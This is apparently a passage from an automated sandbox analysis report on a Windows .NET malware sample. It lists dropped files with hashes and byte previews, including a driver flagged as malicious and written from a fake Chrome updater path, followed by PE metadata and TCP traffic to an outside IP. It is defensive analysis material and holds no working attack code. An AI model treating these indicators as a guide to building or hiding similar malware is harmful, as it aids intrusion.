                                                                        SHA1:E6FCB91617D5FD48E2183A9A02D5709171997FBA
                                                                        SHA-256:2DEB30BC8AB788088A11EDA733F655F2585FDA14ABFEABFBCF56D3974F6DB2EA
                                                                        SHA-512:28C0C0ECF5A21920611FB6E0120A2A4D778E4E47CB22976D16FDB02DB38A78C21B60F3544D111D99A813E284D40FF998B63A995786EC8D9C85793B8B3961107F
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................X....1..h'.t....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................#......i...........................................................................................................&...........**..H..............A..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.396202402379334
                                                                        Encrypted:false
                                                                        SSDEEP:384:IMh4UEiUEfUE5UE0UEfUEtUEpUEAUELUEvUEcUEJUEBUE3UEHUERUExUEeUEaUEW:voHgSNX8+BoUYUkIO
                                                                        MD5:838CCFDA7EEB847C3F96507592B3480B
                                                                        SHA1:1D1C0CA6AFCCC861AFB6B7D2BD500657CC139AC7
                                                                        SHA-256:2E474ECD1D96758EA0BD52D3C594998DFC30DCB83270638B107B41B81FB51339
                                                                        SHA-512:59156BC3267CABA12BB8F542EF10E409F0E685731E8C916681457C9376B36A84DB13B29F006C049528E1E78D63168B9C4B521088FB08445F208432BBDC0EC749
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................0)...*..N..,.....................................................................i..................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............4.............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Security.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.405570226034379
                                                                        Encrypted:false
                                                                        SSDEEP:384:9FRTB4ovbJlojdu6wpoCjojdHojdwo3QxuojdYwvioazojd3ojdlo3Cojd7oDCoz:f3Ixu8W398Q4D2W
                                                                        MD5:F7AD77DB388F97B27D62F568A3373631
                                                                        SHA1:71655A30CAC99D8F75767AF735B5C9E7B45F9995
                                                                        SHA-256:F0739019E0DEA9301F8D5B1847964D7E86B6B2942D1381148874592DACE37287
                                                                        SHA-512:80CD91B88A5FA487E90318391CC54EAD726826D2B304A9D7D7F49B69A1029A87B95450A307C3F05C7348CFA1E606DF149EF4515B8D4D0312DD95947367FBE493
                                                                        Malicious:false
                                                                        Preview:ElfChnk........./.......t...................Pw..`y..%u.d....................................................................4.}.................d...s...h...................=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:...................+.......s...........................................................&...........................................F...=.......**.. ...t....... "}.6.........0.;M&.......0.;M.j.Y)..G2.zA.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                        C:\Windows\System32\winevt\Logs\Setup.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):68440
                                                                        Entropy (8bit):0.47896393707770835
                                                                        Encrypted:false
                                                                        SSDEEP:96:aNVaO8Joax8SRO208w52rNVaO8Joax8SRO208w52:MV701RC6V701RC
                                                                        MD5:4C980E3386B6256C0B4AC1D9BCE24073
                                                                        SHA1:8124C01A189C8294A8883C57433382CA745D9154
                                                                        SHA-256:32EEEDC2433514DA8E490D932A309A86598896346093B281A3C2FD59EDE6F4F9
                                                                        SHA-512:A82D4FD43325C38FB8F3DD55D8674985335EBBC289B0CDBC1CCFC430F24FFA64666695B9F25B81C212014A47A6BD47D578901616AEDD869316D2BDE4F47ABDE9
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........................................X............................................................................n..............................................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............,...6.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\System.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4464
                                                                        Entropy (8bit):4.313558294414202
                                                                        Encrypted:false
                                                                        SSDEEP:96:cFRgRhRNrR2XxDJ6x6ojygxSr58yYvtJl7s/L:GGXfr6xJ6bDY+LxGL
                                                                        MD5:D9FAB8A318569AAE314504E9DA614B74
                                                                        SHA1:A4099ACBD7DF7A3D9F669E5B40DFD494907FE5D4
                                                                        SHA-256:1A9EAB0791FE35348C0114B4E1938DADC9E42407BF0FEDE4EC9BB293DE507EEA
                                                                        SHA-512:96050F019F8FBEA311E90536CF282AA4C42B6C26C25CF5E1EF6B74DD8A0B095CE5BC3FEF1F2D822A5784760CCF7DA365734DA524CE410BC24B67126265D61D32
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................,..8/..............................................................................................R...s...h...............z...=...................................................N...............................a....'..........w.......2.......................G...................................Y...........).......M...5...:...................................&................................................-...................... ...I'..+...............&...........**..............M.".6.........F..&...............................................................L.............!................@M.".6....A....L..JT~.C.....\........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.U.s.e.r.M.o.d.e.P.o.w.e.r.S.e.r.v.i.c.e....9..@..w..I.S.y.s.t.e.m....n@O+.......B...............C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.p.o.w.e.r.c.f.g...e.x.e......."B.8...A...[.`.."B.8...A...[.`.....^S.S.y....**..............`Q'.6.........F..&.....................

                                                                        C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):97040
                                                                        Entropy (8bit):3.8210585008824354
                                                                        Encrypted:false
                                                                        SSDEEP:1536:6E89VtMUjtli/TwE0Js7RMFE89VtMUjtli/TwE0Js7RMyMmYirZOZ2c1R0uXbiws:
                                                                        MD5:9C67A408A72171431BD77A8051D4016E
                                                                        SHA1:60D1B2933586976E566BB4DD3FC8DDF24AB094E1
                                                                        SHA-256:5E2D68BEB621E9014579E0A5ABFCEE98E89F2CB009305D692D4768450C18854B
                                                                        SHA-512:E6E37523CC13FF8BECA16C53E5C0847C5C8F71D578ADCAD795220FBF4E25C0F304E211AA0BC5F767AE6951E17AC08A87A961DC16C71252A3A0FC2110DE2D8772
                                                                        Malicious:false
                                                                        Preview:ElfChnk.................i....................v...{............................................................................w.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...................................&...................................................................................**..8...i........*y.6.........}k..&.......}k.....R.H............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                                        C:\Windows\Temp\__PSScriptPolicyTest_gihj4isu.eh5.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\Temp\__PSScriptPolicyTest_mkmwtu32.fhp.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\Temp\__PSScriptPolicyTest_odx1e05i.gqb.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\Temp\__PSScriptPolicyTest_wc1y43oc.ar2.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\Temp\voeeoiqrjnla.sys

                                                                        Download File
                                                                        Process:C:\ProgramData\Google\Chrome\updater.exe
                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):14544
                                                                        Entropy (8bit):6.2660301556221185
                                                                        Encrypted:false
                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                        Joe Sandbox View:
                                                                        • Filename: Loader.exe, Detection: malicious, Browse
                                                                        • Filename: updater.exe, Detection: malicious, Browse
                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                        • Filename: Laun3cher_E@zy.exe, Detection: malicious, Browse
                                                                        • Filename: daRNfwifay.exe, Detection: malicious, Browse
                                                                        • Filename: cherax.exe, Detection: malicious, Browse
                                                                        • Filename: K4gsPJGEi4.exe, Detection: malicious, Browse
                                                                        • Filename: 32Vec0G7f5.exe, Detection: malicious, Browse
                                                                        • Filename: BZMxi2zof1.exe, Detection: malicious, Browse
                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3444
                                                                        Entropy (8bit):5.011954215267298
                                                                        Encrypted:false
                                                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                        MD5:B133A676D139032A27DE3D9619E70091
                                                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                        Malicious:false
                                                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                                                        C:\Windows\system32\wbem\Performance\WmiApRpl.ini (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):48786
                                                                        Entropy (8bit):3.5854495362228453
                                                                        Encrypted:false
                                                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                        Malicious:false
                                                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.57409878988691
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File size:38'400 bytes
                                                                        MD5:1547e40089b1b06c2e27658c4f478466
                                                                        SHA1:b531e9eaeb0f3e606635623d0775b94e2da113a9
                                                                        SHA256:62133bf304c2143af08217ea5caa1102009e3f70682896ae2997b232f212ec51
                                                                        SHA512:84dadeb9adbd6d0d48924759a507f30410f6719b0e1e436be5cbea579417de7e31a13725829a1d5709b2cbb4edebbb060cd8053e084f2c1e475f0d43232e3922
                                                                        SSDEEP:768:DBjFST01npxFX4ZQXJXbOfq1GkgqskxSgsqG9br:D1XpxFX4ZQlbOmgoSgsqWr
                                                                        TLSH:27032A18A77AC01BD1AFCE7928D9063156319172261FF7A30EC856EFDA937404A07BE3
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{b............................N.... ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00928e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x40ab4e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x627B0FDD [Wed May 11 01:22:37 2022 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xaafc0x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x488.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x8b540x8c00291b9509545054b83d9500079d4081afFalse0.46414620535714285data5.716835242247517IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xc0000x4880x600ba5c03d32cd0108f9297397c43d2a9c2False0.349609375data3.41440845450297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xe0000xc0x2007e0315074e9e090673891d2da6a565d3False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_VERSION0xc0a00x24cdata0.4642857142857143
                                                                        RT_MANIFEST0xc2f00x193XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5732009925558312

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jul 14, 2024 23:41:31.535439968 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:31.535485983 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:31.535609007 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:31.545629978 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:31.545656919 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.196645975 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.196748972 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:32.200697899 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:32.200721025 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.201013088 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.213301897 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:32.256510019 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.605201960 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.605392933 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.605472088 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:32.605487108 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.605731964 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:32.606056929 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.606204033 CEST44349727140.82.121.3192.168.2.5
                                                                        Jul 14, 2024 23:41:32.606262922 CEST49727443192.168.2.5140.82.121.3
                                                                        Jul 14, 2024 23:41:32.670556068 CEST49727443192.168.2.5140.82.121.3
